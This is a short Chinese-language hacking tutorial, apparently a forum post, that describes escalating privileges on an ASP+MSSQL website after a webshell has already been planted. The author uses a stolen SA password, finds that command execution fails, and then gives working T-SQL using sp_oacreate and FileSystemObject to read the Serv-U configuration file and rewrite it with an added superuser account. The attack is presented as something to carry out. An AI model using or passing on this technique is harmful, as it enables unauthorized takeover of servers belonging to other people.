进入正题菜鸟教程,老鸟飞啊------
WEBSHELL已经拿到了,现在我门来提权,
网站是asp+mssql开发的,运气很好找到了SA的密码
我门用SQL连接下看(为了避免网站遭到破坏,呵呵,这里就不看那个密码文件了),这里我已经连接成功,我门来执行命令。。。。
消息 50001,级别 1,状态 50001
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)
郁闷死,进程无法创建--
我门来看看有没其他办法,呵呵装SU,我门可以通过FSO在SU的配置文件里面添加一个超级用户啊。。。
我门先来读取他的配置文件看下,呵呵 成功的读取到了,我门再来添加个用户看看,
呵呵成功添加,我门来登陆看看--成功登陆。。接下来就不用做了吧呵呵!
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 《这里添写自己写好的SU配置信息,刚才复制的那些都要写上去,在最后添加我们自己的,跟我们在WEBSHELL里的serv-u提权是一样的》
|